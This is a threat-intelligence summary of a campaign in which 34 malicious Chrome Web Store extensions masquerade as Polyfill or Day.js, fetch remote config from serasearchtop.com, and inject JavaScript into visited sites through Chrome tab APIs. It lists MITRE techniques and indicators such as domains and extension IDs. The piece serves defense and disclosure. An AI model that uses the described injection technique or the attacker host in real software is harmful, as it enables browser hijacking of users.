Two weeks after reporting PDF Toolbox, researchers uncovered a broader campaign: 34 malicious Chrome Web Store extensions with a combined 87 million users, using obfuscated code and remote configuration to inject JavaScript into visited sites. The malware variants masquerade as Polyfill or Day.js libraries and fetch config from serasearchtop.com, then attempt to inject code via Chrome APIs.
#serasearchtop #PDFToolbox #ZoomPlus #AutoskipForYoutube #CrystalAdBlock #BriskVPN #ImageDownloadCenter #CharmSearching #ChromeWebStore
Keypoints
- 34 malicious extensions identified in the campaign, with 87 million users as of 2023-06-01 (previously 18 extensions and 55 million users).
- Two code variants disguise themselves as legitimate libraries (Polyfill and Day.js) and load data from serasearchtop.com.
- Malware uses chrome.tabs.onUpdated.addListener and chrome.tabs.executeScript to inject arbitrary JavaScript into every visited website.
- The remote configuration data from serasearchtop.com often appears empty in tests, suggesting conditional activation or regional targeting.
- Reviews and user feedback indicate fake reviews and monetization through search result redirection (e.g., references to CharmSearching.com).
- Most extensions were removed from Chrome Web Store by 2023-06-02; a follow-up post discusses technical details.
MITRE Techniques
- [T1036] Masquerading – The extension masquerades as Mozilla’s WebExtension browser API Polyfill. ‘First variant masquerades as Mozilla’s WebExtension browser API Polyfill. The “config” download address is https://serasearchtop.com/cfg//polyfill.json’
- [T1027] Obfuscated/Compressed Files and Information – The malicious code has been added on top of the original module and is more thoroughly obfuscated in newer variants. ‘the code has been obfuscated more thoroughly here’
- [T1059.007] JavaScript – The extensions are meant to inject some arbitrary JavaScript code into every website you visit. ‘So these extensions are meant to inject some arbitrary JavaScript code into every website you visit.’
- [T1105] Ingress Tool Transfer – The extensions download configuration data from serasearchtop.com, e.g., ‘It downloads data from https://serasearchtop.com/cfg//locale.json’
Indicators of Compromise
- [Domain] serasearchtop.com – config data host used by the extensions for polyfill/locale data
- [Domain] CharmSearching.com – domain referenced in historical monetization-related reviews
- [Extension ID] lgjdgmdbfhobkdbcjnpnlmhnplnidkkp – Autoskip for Youtube
- [Extension ID] chmfnmjfghjpdamlofhlonnnnokkpbao – Soundboost
- [Extension ID] lklmhefoneonjalpjcnhaidnodopinib – Crystal Ad block
Read more: https://palant.info/2023/05/31/more-malicious-extensions-in-chrome-web-store/